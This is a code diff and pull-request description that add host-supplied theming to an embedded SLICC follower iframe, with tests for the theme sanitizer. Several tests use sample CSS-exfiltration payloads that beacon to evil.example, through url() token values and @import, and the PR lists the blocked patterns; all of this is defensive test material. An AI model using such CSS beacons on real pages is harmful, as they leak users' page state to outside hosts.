+export function applyCherryTheme(themeJson: string): void {
+  if (typeof document === 'undefined') return;
+  let theme: SliccTheme;
+  try {
+    theme = importTheme(themeJson);
+  } catch {
+    // Malformed theme from host — silently ignore so the follower still boots.
+    return;
+  }
+  if (Object.keys(theme.tokens).length === 0) return;
+
+  const declarations = Object.entries(theme.tokens)
+    .map(([k, v]) => `  ${k}: ${v};`)
+    .join('\n');
+  const shaderRule = theme.disableShader
+    ? `\n.wcui-shader{display:none!important;}\nbody{background:${theme.tokens['--canvas'] || theme.tokens['--s2-gray-25'] || 'var(--canvas)'}!important;}`
+    : '';
+  const componentCss = theme.components ? `\n${generateComponentCss(theme.components)}` : '';
+  const customCss = theme.css ? `\n${theme.css}` : '';
+  const css = `:root {\n${declarations}\n}\n.dark, [data-theme="dark"] {\n${declarations}\n}${shaderRule}${componentCss}${customCss}`;
+
+  const existing = document.getElementById(STYLE_ID);
+  if (existing) {
+    existing.textContent = css;
+  } else {
+    const style = document.createElement('style');
+    style.id = STYLE_ID;
+    style.textContent = css;
+    document.head.appendChild(style);
+  }
+  setShaderVisibility(!theme.disableShader);
+  syncNavAccent(theme);
+  syncBodyThemeMode(theme.base);
+  nudgeThemeObservers();
+}
+
 export function importTheme(json: string): SliccTheme {
   let parsed: unknown;
   try {

--- a/packages/webapp/src/ui/wc/wc-follower.ts
+++ b/packages/webapp/src/ui/wc/wc-follower.ts
@@ -215,6 +215,13 @@ export async function mountWcUiFollower(
     features
   );
   applyFeatureVisibility(features);
+
+  // Apply host-supplied theme if present (cherry only).
+  if (isCherry && prelude.cherryTransport?.theme) {
+    const { applyCherryTheme } = await import('../theme-engine.js');
+    applyCherryTheme(prelude.cherryTransport.theme);
+  }
+
   const controller = new WcChatController({
     thread: boot.refs.thread,
     agent: NOOP_AGENT,

--- a/packages/webapp/tests/cdp/cherry-host-transport-features.test.ts
+++ b/packages/webapp/tests/cdp/cherry-host-transport-features.test.ts
@@ -87,4 +87,44 @@ describe('CherryHostTransport features', () => {
       monitor: true,
     });
   });
+
+  it('exposes theme from handshake welcome', async () => {
+    const h = makeTransport();
+    const connectPromise = h.transport.connect({ timeout: 5000 });
+    const hello = h.posted.find((m) => m.kind === 'handshake.hello');
+
+    const themeJson = JSON.stringify({
+      id: 'cherry-custom',
+      name: 'Cherry Custom',
+      base: 'dark',
+      tokens: { '--s2-gray-25': '#111' },
+    });
+
+    h.inbound({
+      cherry: CHERRY_PROTOCOL_VERSION,
+      channelId: hello.channelId,
+      kind: 'handshake.welcome',
+      joinUrl: 'https://host.example/join?t=X',
+      theme: themeJson,
+    });
+
+    await connectPromise;
+    expect(h.transport.theme).toBe(themeJson);
+  });
+
+  it('theme defaults to null when welcome has no theme field', async () => {
+    const h = makeTransport();
+    const connectPromise = h.transport.connect({ timeout: 5000 });
+    const hello = h.posted.find((m) => m.kind === 'handshake.hello');
+
+    h.inbound({
+      cherry: CHERRY_PROTOCOL_VERSION,
+      channelId: hello.channelId,
+      kind: 'handshake.welcome',
+      joinUrl: 'https://host.example/join?t=X',
+    });
+
+    await connectPromise;
+    expect(h.transport.theme).toBeNull();
+  });
 });

--- a/packages/webapp/tests/ui/theme-engine.test.ts
+++ b/packages/webapp/tests/ui/theme-engine.test.ts
@@ -496,4 +496,105 @@ describe('applyCherryTheme', () => {
     applyCherryTheme(JSON.stringify(theme));
     expect(document.body.getAttribute('data-theme')).toBe('light');
   });
+
+  it('drops a token value containing url() (CSS-exfiltration vector)', () => {
+    const theme: SliccTheme = {
+      id: 'malicious-url',
+      name: 'Malicious',
+      base: 'dark',
+      tokens: {
+        '--s2-gray-25': '#111111',
+        '--s2-accent': "url('https://evil.example/leak?x=1')",
+      },
+    };
+    applyCherryTheme(JSON.stringify(theme));
+
+    const style = document.getElementById('slicc-theme-overrides');
+    expect(style!.textContent).toContain('--s2-gray-25: #111111');
+    expect(style!.textContent).not.toContain('evil.example');
+    expect(style!.textContent).not.toContain('url(');
+  });
+
+  it('drops a token value calling a disallowed CSS function', () => {
+    const theme: SliccTheme = {
+      id: 'disallowed-fn',
+      name: 'Disallowed',
+      base: 'dark',
+      tokens: {
+        '--s2-gray-25': '#111111',
+        '--s2-accent': 'attr(data-evil)',
+      },
+    };
+    applyCherryTheme(JSON.stringify(theme));
+
+    const style = document.getElementById('slicc-theme-overrides');
+    expect(style!.textContent).not.toContain('attr(');
+  });
+
+  it('keeps allowlisted CSS functions in a token value', () => {
+    const theme: SliccTheme = {
+      id: 'safe-fns',
+      name: 'Safe functions',
+      base: 'dark',
+      tokens: {
+        '--s2-gray-25': '#111111',
+        '--s2-accent': 'rgba(255, 0, 0, 0.5)',
+        '--s2-border-default': 'var(--s2-accent)',
+      },
+    };
+    applyCherryTheme(JSON.stringify(theme));
+
+    const style = document.getElementById('slicc-theme-overrides');
+    expect(style!.textContent).toContain('rgba(255, 0, 0, 0.5)');
+    expect(style!.textContent).toContain('var(--s2-accent)');
+  });
+
+  it('drops theme.css entirely when it contains @import (no safe partial-escape)', () => {
+    const theme: SliccTheme = {
+      id: 'malicious-import',
+      name: 'Malicious import',
+      base: 'dark',
+      tokens: { '--s2-gray-25': '#111111' },
+      css: '@import url("https://evil.example/track.css"); .foo { color: red; }',
+    };
+    applyCherryTheme(JSON.stringify(theme));
+
+    const style = document.getElementById('slicc-theme-overrides');
+    expect(style!.textContent).not.toContain('evil.example');
+    expect(style!.textContent).not.toContain('@import');
+    // Legitimate rules in the same css blob are dropped too — no safe partial parse.
+    expect(style!.textContent).not.toContain('.foo');
+  });
+
+  it('drops a component property value containing url()', () => {
+    const theme: SliccTheme = {
+      id: 'malicious-component',
+      name: 'Malicious component',
+      base: 'dark',
+      tokens: { '--s2-gray-25': '#111111' },
+      components: {
+        userBubble: { background: "url('https://evil.example/leak')" },
+      },
+    };
+    applyCherryTheme(JSON.stringify(theme));
+
+    const style = document.getElementById('slicc-theme-overrides');
+    expect(style!.textContent).not.toContain('evil.example');
+  });
+
+  it('drops a fontFamily value containing a function call', () => {
+    const theme: SliccTheme = {
+      id: 'malicious-font',
+      name: 'Malicious font',
+      base: 'dark',
+      tokens: { '--s2-gray-25': '#111111' },
+      components: {
+        composer: { fontFamily: "url('https://evil.example/font.css')" },
+      },
+    };
+    applyCherryTheme(JSON.stringify(theme));
+
+    const style = document.getElementById('slicc-theme-overrides');
+    expect(style!.textContent).not.toContain('evil.example');
+  });
 });

--- a/packages/webapp/tests/ui/theme-engine.test.ts
+++ b/packages/webapp/tests/ui/theme-engine.test.ts
@@ -6,6 +6,7 @@ const hasLocalStorage =
 const describeWithStorage = hasLocalStorage ? describe : describe.skip;
 
 import {
+  applyCherryTheme,
   applyThemeOverrides,
   clearActiveTheme,
   deleteCustomTheme,
@@ -430,5 +431,69 @@ describe('importTheme validation', () => {
     expect(() =>
       importTheme(JSON.stringify({ id: 'x', name: 'X', base: 'dark', tokens: 'string' }))
     ).toThrow('tokens must be');
+  });
+});
+
+describe('applyCherryTheme', () => {
+  beforeEach(() => {
+    document.getElementById('slicc-theme-overrides')?.remove();
+  });
+
+  it('injects a style element with token overrides from a valid theme JSON', () => {
+    const theme: SliccTheme = {
+      id: 'cherry-host',
+      name: 'Host Theme',
+      base: 'dark',
+      tokens: { '--s2-gray-25': '#111111', '--s2-accent': '#ff0000' },
+    };
+    applyCherryTheme(JSON.stringify(theme));
+
+    const style = document.getElementById('slicc-theme-overrides');
+    expect(style).not.toBeNull();
+    expect(style!.textContent).toContain('--s2-gray-25: #111111');
+    expect(style!.textContent).toContain('--s2-accent: #ff0000');
+  });
+
+  it('does nothing for invalid JSON', () => {
+    applyCherryTheme('not valid json {{{');
+    const style = document.getElementById('slicc-theme-overrides');
+    expect(style).toBeNull();
+  });
+
+  it('does nothing for a theme with empty tokens', () => {
+    const theme: SliccTheme = {
+      id: 'empty',
+      name: 'Empty',
+      base: 'dark',
+      tokens: {},
+    };
+    applyCherryTheme(JSON.stringify(theme));
+    const style = document.getElementById('slicc-theme-overrides');
+    expect(style).toBeNull();
+  });
+
+  it('applies custom CSS from the theme', () => {
+    const theme: SliccTheme = {
+      id: 'custom-css',
+      name: 'Custom CSS',
+      base: 'light',
+      tokens: { '--s2-gray-25': '#fff' },
+      css: '.my-class { color: red; }',
+    };
+    applyCherryTheme(JSON.stringify(theme));
+
+    const style = document.getElementById('slicc-theme-overrides');
+    expect(style!.textContent).toContain('.my-class { color: red; }');
+  });
+
+  it('sets body data-theme to match theme base', () => {
+    const theme: SliccTheme = {
+      id: 'light-theme',
+      name: 'Light',
+      base: 'light',
+      tokens: { '--s2-gray-25': '#fafafa' },
+    };
+    applyCherryTheme(JSON.stringify(theme));
+    expect(document.body.getAttribute('data-theme')).toBe('light');
   });
 });


### PR DESCRIPTION
<!--
SLICC PR template. House style: `## Summary` + `## Why` + `## Test plan` /
`## Verification`. Delete sections that don't apply; keep the headings you do
fill in. The prompts in HTML comments are written to surface the things
reviewers most often have to ask for after a draft lands.
-->

<!-- Stacked on / follow-up to: e.g. "Stacked on top of #545. Merge that first." -->
<!-- Linked issue: "Fixes #NNN" / "Closes #NNN" — auto-closes on merge. -->

## Summary
- Add a theme option to mountSlicc() that lets the host apply a brand theme (colors, fonts, custom CSS) inside the embedded cherry follower
- Theme is serialized as JSON in the handshake welcome (host → iframe) and applied on boot via applyCherryTheme
- Static — resolved at mount time; no runtime re-theme
- Security: theme values are sanitized before reaching the follower's <style> element — closes a CSS-exfiltration vector where a host could beacon out DOM state via url(https://evil/?leak=...) token values or @import in custom CSS

<!--
1-3 sentences. *What* changed, in plain English. The "why" goes in the next
section. If this is a bug fix, say what the user saw before and what they see
now (one sentence each).
-->

## Why

<!--
Motivation. Link issues, prior PRs, design docs, or transcripts.
For bug fixes, include a minimal **Repro** the reviewer can run:
  1. <step>
  2. <step>
  Expected: <…>
  Actual:   <…>
For new behavior, link the spec / plan / discussion.
-->

## Approach / Implementation notes

- SliccTheme type exported from the SDK (packages/cherry/src/theme-types.ts), duplicated from packages/webapp/src/ui/theme-types.ts (flagged for future consolidation into @slicc/shared-ts)
- buildThemeCss() + injectThemeStyle() extracted as shared helpers between applyThemeOverrides (local themes) and applyCherryTheme (host-supplied)
- CSS sanitization (sanitizeTheme/sanitizeTokens/sanitizeComponent/sanitizeCustomCss): any value containing url(, @import, expression(, javascript:, angle brackets, or a call to a CSS function outside a small
  allowlist (rgb/rgba/hsl/hsla/hwb/var/calc/clamp/min/max) is dropped rather than partially escaped
- Malformed theme JSON logs a warning (theme-engine logger) instead of failing silently
- JSON.stringify(options.theme) in the SDK is guarded against cyclic/non-serializable input so a bad theme can't take down the whole handshake
- examples/host.html harness: preset dropdown + custom-JSON textarea for manual testing

## Cross-cutting impact

<!--
This is the section reviewers ask for most often. Be explicit about what
changes for code paths NOT directly named by this PR.

- **Floats exercised**: CLI / Chrome extension / Electron / Sliccstart / worker
- **Shell contexts** (extension only): side panel `AlmostBashShell`, offscreen
  `AlmostBashShell`, sandbox iframe — name each one this PR touches or leaves alone.
- **Other callers of the changed function/contract**: if you broadened a
  try/catch, changed an error shape, or rewrote a helper, list the *unrelated*
  callers you checked. ("This `catch` also catches `validateApiKey`'s 404; that
  caller already tolerates rejection.")
- **Persisted state side-effects**: does opening / surfacing / muting also write
  to a ledger that survives reload? (e.g. `slicc-known-sprinkles`,
  `slicc-open-sprinkles`, `selected-model`).
- **Async lifecycle**: disposal guards on `.then(...)` after fetch, listener
  removal on `close`/`error`, debounce vs real `setTimeout` in tests, UTF-8 /
  multi-byte boundaries when scrubbing or chunking streams.
- **Security**: secrets in shell echo / logs / process args, XSS via
  `innerHTML` of attacker-controlled SVG, CSP/MV3 sandbox boundary, deploy-key
  scope across CI steps.
- **Bundle size**: importing a full registry (e.g. `lucide` icons) into the UI
  bundle — quantify if non-trivial.
-->

## Test plan

<!--
Be specific: command + result, not "tested locally". Pre-existing failures are
fine — name them so reviewers don't conflate them with your changes.
-->

- [ ] `npx prettier --write <changed-files>` — CI runs `prettier --check .` as a lint gate
- [ ] `npm run typecheck`
- [ ] `npm run test` — `<N>` passing, no new failures
- [ ] `npm run build`
- [ ] `npm run build -w @slicc/chrome-extension`
- [ ] **New / changed behavior is covered by a unit test** in
      `packages/*/tests/` mirroring the changed `src/` path
      (e.g. `npx vitest run packages/webapp/tests/<area>/<file>.test.ts`)
- [ ] Manual smoke (CLI): `npm run dev` + …
- [ ] Manual smoke (extension): load unpacked `dist/extension/` + …
- [ ] Manual smoke (Electron / Sliccstart / worker) — if relevant
- [ ] N/A — explain below

**Pre-existing failures** (verified against `main`, unrelated to this PR):

<!--
e.g. "17 failures in chat-panel-attachments / telemetry / chat-panel-telemetry
reproduce on `main` at <sha> — unrelated localStorage issues in the test env."
-->

## Documentation

<!-- Pick the tier(s) that apply. See CLAUDE.md > "Documentation". -->

- [ ] `README.md` (user-facing behavior)
- [ ] Relevant `CLAUDE.md` (developer / package architecture)
- [ ] `docs/` (agent reference: tools, commands, skills, patterns)
- [ ] `packages/vfs-root/shared/CLAUDE.md` or `packages/vfs-root/workspace/skills/<skill>/SKILL.md` (agent-facing)
- [ ] No documentation changes needed

## Risk & rollback

<!--
- Blast radius if this regresses (single float / all floats / data migration).
- Feature flags, kill switches, or env knobs introduced.
- How to roll back: revert this PR cleanly? Need a follow-up to undo a
  persisted state migration?
- Anything CI cannot catch (real Chrome CDP behavior, OAuth round-trip,
  Keychain prompt z-order, mounted-folder TCC) that the reviewer should verify
  by hand before approving.
-->

## Checklist

- [ ] Commits are focused and package-local where possible
- [ ] No hand-edited files under `dist/`
- [ ] No secrets, credentials, OAuth client secrets, or tokens in the diff (incl. logs, fixtures, `.env*`, snapshots)
- [ ] Public API / tool / shell-command / lick-channel changes are intentional and reflected in docs
- [ ] If this changes a contract used by other floats (CLI ↔ extension ↔ tray), I checked the followers/leader/offscreen paths
